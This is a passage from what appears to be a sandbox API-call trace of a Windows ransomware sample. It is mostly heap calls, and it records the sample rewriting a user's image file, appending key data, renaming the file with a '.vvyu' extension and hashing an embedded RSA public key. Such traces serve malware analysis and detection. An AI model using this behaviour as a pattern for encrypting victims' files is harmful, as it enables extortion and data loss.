(HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f4b0 [0199.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3140 [0199.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3170 [0199.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31d0 [0199.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3188 [0199.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.475] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31d0 [0199.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0199.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3188 [0199.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3170 [0199.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0199.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0199.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0199.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0199.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0199.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.478] GetCurrentThreadId () returned 0x66c [0199.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0199.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea6610 [0199.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0199.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0199.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.479] GetCurrentThreadId () returned 0x66c [0199.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0199.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31d0 [0199.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3170 [0199.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0199.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3188 [0199.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3158 [0199.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31e8 [0199.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0199.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31b8 [0199.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31a0 [0199.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3200 [0199.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31a0 [0199.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0199.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0199.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3170 [0199.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0199.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0199.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0199.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0199.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0199.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f4b0 | out: hHeap=0x620000) returned 1 [0199.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0199.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.490] WriteFile (in: hFile=0x510, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x149e4, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x149e4, lpOverlapped=0x0) returned 1 [0199.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0199.491] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x149e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.492] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0199.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0199.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0199.493] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.493] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.493] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.493] CloseHandle (hObject=0x510) returned 1 [0199.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0199.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0199.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0199.496] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\-F78Z7ifiP0.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\-f78z7ifip0.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\-F78Z7ifiP0.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\-f78z7ifip0.png.vvyu")) returned 1 [0199.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.498] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6eb88 | out: hHeap=0x620000) returned 1 [0199.501] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43756270, ftCreationTime.dwHighDateTime=0x1d8a3c9, ftLastAccessTime.dwLowDateTime=0x51bc0710, ftLastAccessTime.dwHighDateTime=0x1d8a50b, ftLastWriteTime.dwLowDateTime=0x51bc0710, ftLastWriteTime.dwHighDateTime=0x1d8a50b, nFileSizeHigh=0x0, nFileSizeLow=0xed92, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5qVH55h.bmp", cAlternateFileName="")) returned 1 [0199.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6eb88 [0199.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.501] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\5qVH55h.bmp") returned=".bmp" [0199.501] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\5qVH55h.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\5qvh55h.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.503] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=60818) returned 1 [0199.503] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.505] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xed6c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.505] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.508] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.508] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xed92, lpOverlapped=0x0) returned 1 [0199.509] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.509] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.509] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.509] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0199.510] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.510] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.510] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.510] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.511] GetLastError () returned 0x0 [0199.511] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.511] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0199.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.511] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.511] 